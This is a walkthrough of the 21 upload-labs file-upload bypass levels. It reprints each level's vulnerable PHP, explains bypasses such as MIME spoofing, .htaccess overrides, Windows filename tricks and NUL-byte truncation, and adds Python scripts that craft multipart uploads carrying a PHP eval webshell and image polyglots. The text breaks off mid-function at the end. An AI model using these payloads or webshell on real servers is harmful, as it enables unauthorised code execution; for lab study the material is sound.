upload-labs writeup (21 levels)

Published: 2023/12/31

Contents

    • Level 1
    • Level 2
    • Level 3
    • Level 4
    • Level 5
    • Level 6
    • Level 7
    • Level 8
    • Level 9
    • Level 10
    • Level 11
    • Level 12
    • Level 13
    • Level 14
    • Level 15
    • Level 16
    • Level 17
    • Level 18
    • Level 19
    • Level 20
    • Level 21

Lab environment: https://github.com/c0ny1/upload-labs
A new level 5 was added and the later levels were renumbered, so there are now 21 levels in total.

Level 1

Not much to say: just upload the shell as-is.

An alert pops up, and if Burp is intercepting you will notice that no request was captured at all: the upload was stopped before it ever left the browser. That means the check is client-side JavaScript, so disabling JavaScript or editing the page (removing the call to checkFile()) is enough; alternatively upload the shell as xx.jpg and change the filename to xx.php in the proxy.

Afterwards request xx.php: either drive it directly through the URL or connect with Cknife / AntSword.

Finally, a look at the source:

    function checkFile() {
        // value of the first element named upload_file, i.e. the chosen file's path
        var file = document.getElementsByName('upload_file')[0].value;
        if (file == null || file == "") {
            alert("Please select a file to upload!");
            return false;   // cancel the form's default submit action
        }
        // file types allowed for upload
        var allow_ext = ".jpg|.png|.gif";
        // extract the extension: substring from the last "." to the end of the string
        var ext_name = file.substring(file.lastIndexOf("."));
        // is the extension allowed? indexOf returns the first position (0-based) of
        // ext_name + "|" inside allow_ext, or -1 if it is not found
        // (note: allow_ext has no trailing "|", so ".gif|" is never found and .gif is rejected too)
        if (allow_ext.indexOf(ext_name + "|") == -1) {
            var errMsg = "This file type is not allowed, please upload a " + allow_ext + " file; current type: " + ext_name;
            alert(errMsg);
            return false;   // cancel the submit
        }
    }

Level 2

    $is_upload = false;
    $msg = null;
    if (isset($_POST['submit'])) {
        if (file_exists($UPLOAD_ADDR)) {
            if (($_FILES['upload_file']['type'] == 'image/jpeg') || ($_FILES['upload_file']['type'] == 'image/png') || ($_FILES['upload_file']['type'] == 'image/gif')) {
                if (move_uploaded_file($_FILES['upload_file']['tmp_name'], $UPLOAD_ADDR . '/' . $_FILES['upload_file']['name'])) {
                    $img_path = $UPLOAD_ADDR . $_FILES['upload_file']['name'];
                    $is_upload = true;
                }
            } else {
                $msg = 'Wrong file type, please upload again!';
            }
        } else {
            $msg = $UPLOAD_ADDR.' folder does not exist, please create it manually!';
        }
    }

MIME type check: only a Content-Type of image/jpeg, image/png or image/gif is accepted, and that value comes straight from the request.
Option 1: upload xx.php directly, intercept with Burp and change the part's Content-Type to image/jpeg.
Option 2: rename the shell to .jpg, upload it, intercept with Burp and change the filename back to .php (the image Content-Type the browser chose for the .jpg stays).

Level 3

    $is_upload = false;
    $msg = null;
    if (isset($_POST['submit'])) {
        if (file_exists($UPLOAD_ADDR)) {
            $deny_ext = array('.asp','.aspx','.php','.jsp');
            $file_name = trim($_FILES['upload_file']['name']);
            $file_name = deldot($file_name);   // strip trailing dots from the file name
            $file_ext = strrchr($file_name, '.');
            $file_ext = strtolower($file_ext);  // lower-case
            $file_ext = str_ireplace('::$DATA', '', $file_ext);  // remove the string ::$DATA
            $file_ext = trim($file_ext);        // strip leading/trailing whitespace
            if(!in_array($file_ext, $deny_ext)) {
                if (move_uploaded_file($_FILES['upload_file']['tmp_name'], $UPLOAD_ADDR. '/' . $_FILES['upload_file']['name'])) {
                    $img_path = $UPLOAD_ADDR .'/'. $_FILES['upload_file']['name'];
                    $is_upload = true;
                }
            } else {
                $msg = 'Uploading .asp, .aspx, .php or .jsp files is not allowed!';
            }
        } else {
            $msg = $UPLOAD_ADDR . ' folder does not exist, please create it manually!';
        }
    }

Blacklist filtering, but only four extensions are listed.
Idea: try one of the alternative PHP extensions php2/php3/php4/php5/phtml; I uploaded a .phtml here.
Why is .phtml executed? Search Apache's httpd.conf (I use phpStudy 2018) for AddType application/x-httpd-php: that directive lists which extensions are handed to PHP. A leading # means the line is commented out; remove it and restart Apache. Whether this bypass works on a real target therefore depends entirely on that server's handler configuration.

Level 4

    $is_upload = false;
    $msg = null;
    if (isset($_POST['submit'])) {
        if (file_exists($UPLOAD_ADDR)) {
            $deny_ext = array(".php",".php5",".php4",".php3",".php2","php1",".html",".htm",".phtml",
                ".pHp",".pHp5",".pHp4",".pHp3",".pHp2","pHp1",".Html",".Htm",".pHtml",
                ".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",
                ".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",
                ".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",
                ".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",
                ".sWf",".swf");
            $file_name = trim($_FILES['upload_file']['name']);
            $file_name = deldot($file_name);   // strip trailing dots from the file name
            $file_ext = strrchr($file_name, '.');
            $file_ext = strtolower($file_ext);  // lower-case
            $file_ext = str_ireplace('::$DATA', '', $file_ext);  // remove the string ::$DATA
            $file_ext = trim($file_ext);        // strip leading/trailing whitespace
            if (!in_array($file_ext, $deny_ext)) {
                if (move_uploaded_file($_FILES['upload_file']['tmp_name'], $UPLOAD_ADDR . '/' . $_FILES['upload_file']['name'])) {
                    $img_path = $UPLOAD_ADDR . $_FILES['upload_file']['name'];
                    $is_upload = true;
                }
            } else {
                $msg = 'This file is not allowed!';
            }
        } else {
            $msg = $UPLOAD_ADDR . ' folder does not exist, please create it manually!';
        }
    }

Almost every executable extension is blacklisted, except .htaccess.
Idea: upload a .htaccess file containing `SetHandler application/x-httpd-php`, which makes Apache run every file in that directory as PHP; to target a single extension instead, use `AddType application/x-httpd-php .jpg`. Then upload the shell as xx.jpg. This only works when Apache honours per-directory overrides for the upload folder (AllowOverride must permit FileInfo), which is not the case on every server.

Level 5

    $is_upload = false;
    $msg = null;
    if (isset($_POST['submit'])) {
        if (file_exists(UPLOAD_PATH)) {
            $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",
                ".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",
                ".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",
                ".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",
                ".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",
                ".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",
                ".sWf",".swf",".htaccess");
            $file_name = trim($_FILES['upload_file']['name']);
            $file_name = deldot($file_name);   // strip trailing dots from the file name
            $file_ext = strrchr($file_name, '.');
            $file_ext = strtolower($file_ext);  // lower-case
            $file_ext = str_ireplace('::$DATA', '', $file_ext);  // remove the string ::$DATA
            $file_ext = trim($file_ext);        // strip leading/trailing whitespace
            if (!in_array($file_ext, $deny_ext)) {
                $temp_file = $_FILES['upload_file']['tmp_name'];
                $img_path = UPLOAD_PATH.'/'.$file_name;
                if (move_uploaded_file($temp_file, $img_path)) {
                    $is_upload = true;
                } else {
                    $msg = 'Upload error!';
                }
            } else {
                $msg = 'This file type is not allowed!';
            }
        } else {
            $msg = UPLOAD_PATH . ' folder does not exist, please create it manually!';
        }
    }

The new level 5 extends level 4's blacklist with .htaccess and .pht, so the .htaccess trick is gone. Bypass with the name x.php. . (dot, space, dot), exactly as in level 10: trim() leaves the name alone because it ends in a dot, deldot() removes only the final dot and stops at the space, and the extension that is checked is "." which is not on the list; Windows then discards the trailing space and dot when the file is written.

Level 6

    $is_upload = false;
    $msg = null;
    if (isset($_POST['submit'])) {
        if (file_exists($UPLOAD_ADDR)) {
            $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",
                ".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",
                ".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",
                ".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",
                ".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",
                ".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",
                ".sWf",".swf",".htaccess");
            $file_name = trim($_FILES['upload_file']['name']);
            $file_name = deldot($file_name);   // strip trailing dots from the file name
            $file_ext = strrchr($file_name, '.');
            $file_ext = str_ireplace('::$DATA', '', $file_ext);  // remove the string ::$DATA
            $file_ext = trim($file_ext);        // strip leading/trailing whitespace
            if (!in_array($file_ext, $deny_ext)) {
                if (move_uploaded_file($_FILES['upload_file']['tmp_name'], $UPLOAD_ADDR . '/' . $_FILES['upload_file']['name'])) {
                    $img_path = $UPLOAD_ADDR . '/' . $file_name;
                    $is_upload = true;
                }
            } else {
                $msg = 'This file is not allowed';
            }
        } else {
            $msg = $UPLOAD_ADDR . ' folder does not exist, please create it manually!';
        }
    }

The strtolower() step is missing, so the extension is compared case-sensitively: upload xx.PHP (the list contains a few mixed-case spellings such as .pHp, but not .PHP). Windows file names are case-insensitive and Apache's mod_mime matches extensions case-insensitively, so the file still runs as PHP.

Level 7

    $is_upload = false;
    $msg = null;
    if (isset($_POST['submit'])) {
        if (file_exists($UPLOAD_ADDR)) {
            $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",
                ".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",
                ".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",
                ".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",
                ".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",
                ".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",
                ".sWf",".swf",".htaccess");
            $file_name = $_FILES['upload_file']['name'];
            $file_name = deldot($file_name);   // strip trailing dots from the file name
            $file_ext = strrchr($file_name, '.');
            $file_ext = strtolower($file_ext);  // lower-case
            $file_ext = str_ireplace('::$DATA', '', $file_ext);  // remove the string ::$DATA
            if (!in_array($file_ext, $deny_ext)) {
                if (move_uploaded_file($_FILES['upload_file']['tmp_name'], $UPLOAD_ADDR . '/' . $_FILES['upload_file']['name'])) {
                    $img_path = $UPLOAD_ADDR . '/' . $file_name;
                    $is_upload = true;
                }
            } else {
                $msg = 'This file is not allowed';
            }
        } else {
            $msg = $UPLOAD_ADDR . ' folder does not exist, please create it manually!';
        }
    }

Still a blacklist, but neither the file name nor the extension is trimmed, so a trailing space gets through.
Idea: upload the file as "xx.php " with a space after php. Windows will not let you create such a name locally, so change the filename in Burp.
Why it works: ".php " is not on the list, so nothing is blocked; when the file is written on a Windows server the trailing space is discarded and the name becomes xx.php again.

Level 8

    $is_upload = false;
    $msg = null;
    if (isset($_POST['submit'])) {
        if (file_exists($UPLOAD_ADDR)) {
            $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".ht",".phtml",
                ".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",
                ".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",
                ".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",
                ".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",
                ".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",
                ".sWf",".swf",".htaccess");
            $file_name = trim($_FILES['upload_file']['name']);
            $file_ext = strrchr($file_name, '.');
            $file_ext = strtolower($file_ext);  // lower-case
            $file_ext = str_ireplace('::$DATA', '', $file_ext);  // remove the string ::$DATA
            $file_ext = trim($file_ext);        // strip leading/trailing whitespace
            if (!in_array($file_ext, $deny_ext)) {
                if (move_uploaded_file($_FILES['upload_file']['tmp_name'], $UPLOAD_ADDR . '/' . $_FILES['upload_file']['name'])) {
                    $img_path = $UPLOAD_ADDR . '/' . $file_name;
                    $is_upload = true;
                }
            } else {
                $msg = 'This file is not allowed';
            }
        } else {
            $msg = $UPLOAD_ADDR . ' folder does not exist, please create it manually!';
        }
    }

Idea: same Windows behaviour as in level 7. deldot() is no longer called, so upload xx.php. (trailing dot): the extension that is checked is "." and Windows drops the trailing dot when the file is written.

Level 9

    $is_upload = false;
    $msg = null;
    if (isset($_POST['submit'])) {
        if (file_exists($UPLOAD_ADDR)) {
            $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",
                ".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",
                ".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",
                ".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",
                ".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",
                ".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",
                ".sWf",".swf",".htaccess");
            $file_name = trim($_FILES['upload_file']['name']);
            $file_name = deldot($file_name);   // strip trailing dots from the file name
            $file_ext = strrchr($file_name, '.');
            $file_ext = strtolower($file_ext);  // lower-case
            $file_ext = trim($file_ext);        // strip leading/trailing whitespace
            if (!in_array($file_ext, $deny_ext)) {
                if (move_uploaded_file($_FILES['upload_file']['tmp_name'], $UPLOAD_ADDR . '/' . $_FILES['upload_file']['name'])) {
                    $img_path = $UPLOAD_ADDR . '/' . $file_name;
                    $is_upload = true;
                }
            } else {
                $msg = 'This file is not allowed';
            }
        } else {
            $msg = $UPLOAD_ADDR . ' folder does not exist, please create it manually!';
        }
    }

Idea: same Windows behaviour as in level 7. The ::$DATA removal is gone, so upload xx.php::$DATA: the checked extension ".php::$data" is not on the list, and on NTFS "::$DATA" only names the file's default data stream, so the file is stored as xx.php.

Level 10

    $is_upload = false;
    $msg = null;
    if (isset($_POST['submit'])) {
        if (file_exists($UPLOAD_ADDR)) {
            $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",
                ".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",
                ".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",
                ".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",
                ".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",
                ".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",
                ".sWf",".swf",".htaccess");
            $file_name = trim($_FILES['upload_file']['name']);
            $file_name = deldot($file_name);   // strip trailing dots from the file name
            $file_ext = strrchr($file_name, '.');
            $file_ext = strtolower($file_ext);  // lower-case
            $file_ext = str_ireplace('::$DATA', '', $file_ext);  // remove the string ::$DATA
            $file_ext = trim($file_ext);        // strip leading/trailing whitespace
            if (!in_array($file_ext, $deny_ext)) {
                if (move_uploaded_file($_FILES['upload_file']['tmp_name'], $UPLOAD_ADDR . '/' . $_FILES['upload_file']['name'])) {
                    $img_path = $UPLOAD_ADDR . '/' . $file_name;   // ../upload/$filename
                    $is_upload = true;
                }
            } else {
                $msg = 'This file is not allowed';
            }
        } else {
            $msg = $UPLOAD_ADDR . ' folder does not exist, please create it manually!';
        }
    }

Every step is present, but the file name itself only goes through trim() and deldot().
Idea: upload xx.php. . (dot, space, dot).

Why it works: "xx.php. ." is not in $deny_ext. trim() leaves the name unchanged because it ends with a dot. deldot() strips only the final dot and stops at the space, returning "xx.php. " (dot, space). strrchr() then yields ". ", which becomes "." after trim(), and "." is not blacklisted. move_uploaded_file() is given the raw $_FILES name, so the file lands in ../upload as "xx.php. ."; the $img_path of ../upload/xx.php. built from the cleaned name is never used for the write.

deldot() traced for $s = "xx.php. ." (9 characters, so $i starts at 8):

    function deldot($s){
        for($i = strlen($s)-1;$i>0;$i--){
            $c = substr($s,$i,1);              // 1st pass ($i=8): $c = '.'; 2nd pass ($i=7): $c = ' '
            if($i == strlen($s)-1 and $c != '.'){
                // fires only when the LAST character is not a dot; 8 == 8 but '.' == '.', so skipped
                return $s;
            }
            if($c != '.'){
                // 1st pass: '.' == '.', keep looping; 2nd pass: ' ' != '.', so
                // return substr($s, 0, 8) = "xx.php. " (substr's third argument is a length)
                return substr($s,0,$i+1);
            }
        }
    }

What reaches the disk is xx.php. . and, because Windows discards trailing dots and spaces, the file is stored as xx.php.

Level 11

    $is_upload = false;
    $msg = null;
    if (isset($_POST['submit'])) {
        if (file_exists($UPLOAD_ADDR)) {
            $deny_ext = array("php","php5","php4","php3","php2","html","htm","phtml",
                "jsp","jspa","jspx","jsw","jsv","jspf","jtml",
                "asp","aspx","asa","asax","ascx","ashx","asmx","cer","swf","htaccess");
            $file_name = trim($_FILES['upload_file']['name']);
            $file_name = str_ireplace($deny_ext,"", $file_name);
            if (move_uploaded_file($_FILES['upload_file']['tmp_name'], $UPLOAD_ADDR . '/' . $file_name)) {
                $img_path = $UPLOAD_ADDR . '/' .$file_name;
                $is_upload = true;
            }
        } else {
            $msg = $UPLOAD_ADDR . ' folder does not exist, please create it manually!';
        }
    }

Idea: double-write the extension, e.g. xx.pphphp.
Note: str_ireplace() with an array of search strings makes one left-to-right pass per term and removes every occurrence it finds, without rescanning the result for the same term. A name like xx.phphpp therefore does not work: removing the first "php" leaves xx.hpp. In xx.pphphp the only "php" sits in the middle, and cutting it out leaves xx.php.
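The filter chains of levels 5 to 10 and the str_ireplace() stripping of level 11 are easy to get wrong by hand, so here is a Python model of them (an added example, not part of the original writeup or of upload-labs). deldot(), the trim/strrchr/strtolower/::$DATA steps and PHP's sequential str_ireplace() are ported one-to-one; the blacklist is an abbreviated subset of the lab's list; windows_stored_name() encodes the NTFS rules the levels rely on (trailing dots and spaces discarded, ::$DATA naming the default stream) and is an assumption about the target being Windows.

```python
"""Model of the upload-labs blacklist filters (levels 5-11) and the Windows name rules they rely on."""
import re
from typing import List

# Abbreviated subset of the lab's $deny_ext (the real list also carries mixed-case spellings such as .pHp).
DENY_EXT = {".php", ".php5", ".php4", ".php3", ".php2", ".html", ".htm", ".phtml",
            ".pht", ".jsp", ".asp", ".aspx", ".swf", ".htaccess"}
# Level 11's list has no leading dots because it feeds str_ireplace(), not in_array().
LEVEL11_DENY = ["php", "php5", "php4", "php3", "php2", "html", "htm", "phtml", "jsp", "jspa",
                "jspx", "jsw", "jsv", "jspf", "jtml", "asp", "aspx", "asa", "asax", "ascx",
                "ashx", "asmx", "cer", "swf", "htaccess"]


def php_trim(s: str) -> str:
    """PHP trim() default character set: space, tab, LF, CR, NUL, vertical tab."""
    return s.strip(" \t\n\r\0\x0b")


def deldot(s: str) -> str:
    """Port of the lab's deldot(): walk backwards and cut after the first non-dot character."""
    for i in range(len(s) - 1, 0, -1):
        c = s[i]
        if i == len(s) - 1 and c != ".":
            return s                 # last char is not a dot: nothing to strip
        if c != ".":
            return s[: i + 1]        # keep everything up to and including this char
    return ""                        # PHP returns NULL here (name was all dots)


def filtered_ext(name: str, *, trim_name=True, strip_dots=True, lower=True,
                 strip_ads=True, trim_ext=True) -> str:
    """The level-10 pipeline; switching one flag off reproduces the weaker levels 6-9."""
    if trim_name:
        name = php_trim(name)
    if strip_dots:
        name = deldot(name)
    idx = name.rfind(".")            # strrchr($name, '.'): from the LAST dot to the end
    ext = name[idx:] if idx != -1 else ""
    if lower:
        ext = ext.lower()
    if strip_ads:
        ext = re.sub(re.escape("::$DATA"), "", ext, flags=re.IGNORECASE)
    if trim_ext:
        ext = php_trim(ext)
    return ext


def blacklist_allows(name: str, **flags) -> bool:
    return filtered_ext(name, **flags) not in DENY_EXT


def str_ireplace(search: List[str], replace: str, subject: str) -> str:
    """PHP str_ireplace() with an array of search strings: one case-insensitive pass per term,
    in array order, never re-scanning what an earlier pass produced."""
    for term in search:
        subject = re.sub(re.escape(term), lambda _m: replace, subject, flags=re.IGNORECASE)
    return subject


def windows_stored_name(name: str) -> str:
    """Assumed NTFS rules: '::$DATA' addresses the file's default stream, and trailing
    dots/spaces are discarded when the file is created."""
    if name.upper().endswith("::$DATA"):
        name = name[: -len("::$DATA")]
    return name.rstrip(" .")


if __name__ == "__main__":
    cases = [
        ("level 6  (no strtolower)", "xx.PHP", dict(lower=False)),
        ("level 7  (no trim)", "xx.php ", dict(trim_name=False, trim_ext=False)),
        ("level 8  (no deldot)", "xx.php.", dict(strip_dots=False)),
        ("level 9  (no ::$DATA)", "xx.php::$DATA", dict(strip_ads=False)),
        ("level 10 (all steps)", "xx.php. .", {}),
    ]
    for label, name, flags in cases:
        print(f"{label:24} {name!r:18} ext={filtered_ext(name, **flags)!r:14} "
              f"allowed={blacklist_allows(name, **flags)!s:5} stored as {windows_stored_name(name)!r}")
    for name in ("xx.pphphp", "xx.phphpp"):
        print(f"level 11 {name!r} -> {str_ireplace(LEVEL11_DENY, '', name)!r}")
```

Run it and each level's bypass name shows up as allowed while the plain xx.php is denied; flipping the same flag back on shows why the next level's filter closes that hole.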

Level 12

Prerequisite: magic_quotes_gpc = Off and a PHP version older than 5.3.4 (5.3.4 fixed NUL bytes in file paths).

    $is_upload = false;
    $msg = null;
    if(isset($_POST['submit'])){
        $ext_arr = array('jpg','png','gif');
        $file_ext = substr($_FILES['upload_file']['name'],strrpos($_FILES['upload_file']['name'],".")+1);
        if(in_array($file_ext,$ext_arr)){
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = $_GET['save_path']."/".rand(10, 99).date("YmdHis").".".$file_ext;
            if(move_uploaded_file($temp_file,$img_path)){
                $is_upload = true;
            }else{
                $msg = 'Upload failed!';
            }
        }else{
            $msg = "Only .jpg|.png|.gif files are allowed!";
        }
    }

Idea: $img_path is built by concatenation from the save_path query parameter, so a %00 in it truncates everything appended after it. Upload a file named xx.jpg (the whitelist only looks at the name), intercept it with Burp and set, for example, save_path=../upload/xx3.php%00.

The server then builds ../upload/xx3.php<NUL>/<two random digits><timestamp>.jpg, and the C file APIs underneath move_uploaded_file() stop at the NUL byte, so the file is written as xx3.php; request xx3.php directly.

Level 13

    $is_upload = false;
    $msg = null;
    if(isset($_POST['submit'])){
        $ext_arr = array('jpg','png','gif');
        $file_ext = substr($_FILES['upload_file']['name'],strrpos($_FILES['upload_file']['name'],".")+1);
        if(in_array($file_ext,$ext_arr)){
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = $_POST['save_path']."/".rand(10, 99).date("YmdHis").".".$file_ext;
            if(move_uploaded_file($temp_file,$img_path)){
                $is_upload = true;
            }else{
                $msg = "Upload failed";
            }
        }else{
            $msg = "Only .jpg|.png|.gif files are allowed!";
        }
    }

Idea: like level 12, except that save_path now comes from the POST body, so the NUL byte has to be placed in the body itself: type %00 into the save_path value in Burp, select it and URL-decode it so it becomes a raw 0x00 byte. (The web server URL-decodes a GET query string for you, but a multipart body is delivered byte for byte, so a literal "%00" would stay three harmless characters.)

Alternatively use the Hex tab: insert a 00 byte right after the "p" of .php (the hex value of "p" is 0x70).
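Every Burp edit in levels 2, 7, 12, 13 and 21 is just a change to the bytes of the multipart request, so the following added example (not from the original writeup or from upload-labs) builds that request by hand with the Python standard library: the filename, the part's Content-Type and each form field are written verbatim, which is how a trailing space or a raw 0x00 byte gets to the server. The URL, the "submit" field value and the save_name[0]/save_name[2] array layout are assumptions about the lab's form; the shell string is the writeup's one-liner.

```python
"""Hand-built multipart/form-data uploads: filename, part Content-Type and field bytes are all ours."""
import os
import urllib.request
from urllib.parse import quote
from typing import Dict, Optional, Tuple, Union

# The writeup's one-line PHP shell, used as the uploaded content.
WEBSHELL = b"<?php @eval($_REQUEST[peak]);?>"


def build_multipart(fields: Dict[str, Union[str, bytes]], file_field: str, filename: str,
                    content_type: str, data: bytes,
                    boundary: Optional[str] = None) -> Tuple[bytes, str]:
    """Return (body, boundary). Nothing is escaped or normalised: a trailing space in
    `filename` or a 0x00 byte inside a field value is sent exactly as given."""
    boundary = boundary or "----lab" + os.urandom(8).hex()
    b = boundary.encode()
    parts = []
    for name, value in fields.items():
        parts += [b"--" + b,
                  b'Content-Disposition: form-data; name="' + name.encode() + b'"',
                  b"",
                  value if isinstance(value, bytes) else value.encode()]
    parts += [b"--" + b,
              b'Content-Disposition: form-data; name="' + file_field.encode()
              + b'"; filename="' + filename.encode() + b'"',
              b"Content-Type: " + content_type.encode(),
              b"",
              data,
              b"--" + b + b"--",
              b""]
    return b"\r\n".join(parts), boundary


def level2_body() -> Tuple[bytes, str]:
    """Level 2 trusts $_FILES[...]['type'], i.e. this header: keep the .php name, lie about the MIME."""
    return build_multipart({"submit": "upload"}, "upload_file", "xx.php", "image/jpeg", WEBSHELL)


def level7_body() -> Tuple[bytes, str]:
    """Level 7 never trims the name: 'xx.php ' (trailing space) is not on the blacklist.
    Windows will not let you create that file locally, but the header is only bytes."""
    return build_multipart({"submit": "upload"}, "upload_file", "xx.php ", "image/jpeg", WEBSHELL)


def level12_url(base_url: str, save_path: str = "../upload/xx3.php\x00") -> str:
    """Level 12 reads save_path from $_GET: the server URL-decodes %00 into a NUL byte for us."""
    return base_url + "?save_path=" + quote(save_path, safe="/")


def level13_body(save_path: str = "../upload/xx3.php\x00") -> Tuple[bytes, str]:
    """Level 13 reads save_path from $_POST: multipart bodies are not URL-decoded, so the
    NUL must be a literal 0x00 byte in the body (what Burp's URL-decode or hex edit does)."""
    return build_multipart({"submit": "upload", "save_path": save_path},
                           "upload_file", "xx.jpg", "image/jpeg", WEBSHELL)


def level21_body() -> Tuple[bytes, str]:
    """Level 21 accepts save_name as an array: PHP builds it from bracketed field names.
    Index 1 is deliberately missing (assumed layout, see the level-21 discussion)."""
    return build_multipart({"save_name[0]": "xx.php/", "save_name[2]": "jpg"},
                           "upload_file", "x.php", "image/jpeg", WEBSHELL)


def post(url: str, body: bytes, boundary: str, timeout: float = 10.0) -> bytes:
    """Send one crafted upload (assumes the lab is reachable at `url`)."""
    req = urllib.request.Request(
        url, data=body, method="POST",
        headers={"Content-Type": "multipart/form-data; boundary=" + boundary})
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read()


if __name__ == "__main__":
    body, boundary = level13_body()
    print(body.decode("latin-1").replace("\x00", "<NUL>"))
    # post("http://target/index.php", body, boundary)   # uncomment against your own lab
```

The same builder is what a script-based replay of any of the Burp edits needs; the only thing that changes per level is which bytes you lie about.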

Level 14

    function getReailFileType($filename){
        $file = fopen($filename, "rb");
        $bin = fread($file, 2); // only the first 2 bytes are read
        fclose($file);
        $strInfo = @unpack("C2chars", $bin);
        $typeCode = intval($strInfo['chars1'].$strInfo['chars2']);
        $fileType = '';
        switch($typeCode){
            case 255216:
                $fileType = 'jpg';
                break;
            case 13780:
                $fileType = 'png';
                break;
            case 7173:
                $fileType = 'gif';
                break;
            default:
                $fileType = 'unknown';
        }
        return $fileType;
    }

    $is_upload = false;
    $msg = null;
    if(isset($_POST['submit'])){
        $temp_file = $_FILES['upload_file']['tmp_name'];
        $file_type = getReailFileType($temp_file);
        if($file_type == 'unknown'){
            $msg = "Unknown file type, upload failed!";
        }else{
            $img_path = $UPLOAD_ADDR."/".rand(10, 99).date("YmdHis").".".$file_type;
            if(move_uploaded_file($temp_file,$img_path)){
                $is_upload = true;
            }else{
                $msg = "Upload failed";
            }
        }
    }

Idea: only the first two bytes are inspected, so upload an image shell. On Windows build it with copy x.jpg/b + x.php/a xx.jpg (/b binary, /a text). After the upload you still need a way to execute it: a file-inclusion vulnerability, or a target that parses .jpg as PHP. In a real engagement put the one-liner in the middle of the image rather than at the end, where it is less conspicuous; WinHex or Burp can edit it in.
Caveat for copy: the image must come first. copy x.php/a + x.gif/b xx.gif yields a file whose first bytes are "<?", so it neither passes this check nor displays as an image.

Level 15

    function isImage($filename){
        $types = '.jpeg|.png|.gif';
        if(file_exists($filename)){
            $info = getimagesize($filename);
            $ext = image_type_to_extension($info[2]);
            if(stripos($types,$ext)){
                return $ext;
            }else{
                return false;
            }
        }else{
            return false;
        }
    }

    $is_upload = false;
    $msg = null;
    if(isset($_POST['submit'])){
        $temp_file = $_FILES['upload_file']['tmp_name'];
        $res = isImage($temp_file);
        if(!$res){
            $msg = "Unknown file type, upload failed!";
        }else{
            $img_path = $UPLOAD_ADDR."/".rand(10, 99).date("YmdHis").$res;
            if(move_uploaded_file($temp_file,$img_path)){
                $is_upload = true;
            }else{
                $msg = "Upload failed";
            }
        }
    }

Idea: only .jpeg, .png and .gif are accepted. I could not get a jpeg through no matter what; the header was right, it just would not work. gif and png both do.
The functions that matter are getimagesize(), image_type_to_extension() and stripos(), and in the end isImage() has to return $ext. The jpeg failure is in the code, not in the image: for a JPEG image_type_to_extension() returns ".jpeg", which sits at position 0 of $types, and a stripos() result of 0 is falsy inside the if, so isImage() returns false for every JPEG. Because getimagesize() decodes the image header, the image half of the polyglot must be a genuine image and not just the magic bytes.
Common image signatures:

    JPEG (jpg)   FF D8 FF
    PNG  (png)   89 50 4E 47
    GIF  (gif)   47 49 46 38   (that is "GIF8", the start of GIF89a)
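To make the two-byte check of level 14 and the header-decoding checks of levels 15 and 16 concrete, the following added example (not from the original writeup or from upload-labs) builds a genuine 1x1 GIF and a genuine 1x1 PNG from scratch, appends the writeup's one-liner the way `copy image/b + shell.php/a` does, and ports getReailFileType() to show which byte order passes and which does not. The 43-byte GIF is a constructed constant; the PNG is assembled chunk by chunk with correct CRCs.

```python
"""Image-shell construction and the level-14 two-byte type check, modelled in Python."""
import struct
import zlib

# The writeup's one-line shell, appended after the image data.
WEBSHELL = b"<?php @eval($_REQUEST[peak]);?>"

# Constructed constant: a complete, valid 1x1 GIF89a (43 bytes) with a 2-colour global palette.
MIN_GIF = bytes.fromhex(
    "47494638396101000100800000000000ffffff"   # 'GIF89a', 1x1, global colour table flag, 2 colours
    "21f90401000000002c000000000100010000"     # graphic control extension + image descriptor
    "0202440100"                               # LZW minimum code size 2, one data sub-block, terminator
    "3b")                                      # trailer ';' -- decoders stop here


def make_png_1x1() -> bytes:
    """A valid 1x1 RGB PNG built from scratch (signature + IHDR + IDAT + IEND, each with its CRC)."""
    def chunk(tag: bytes, payload: bytes) -> bytes:
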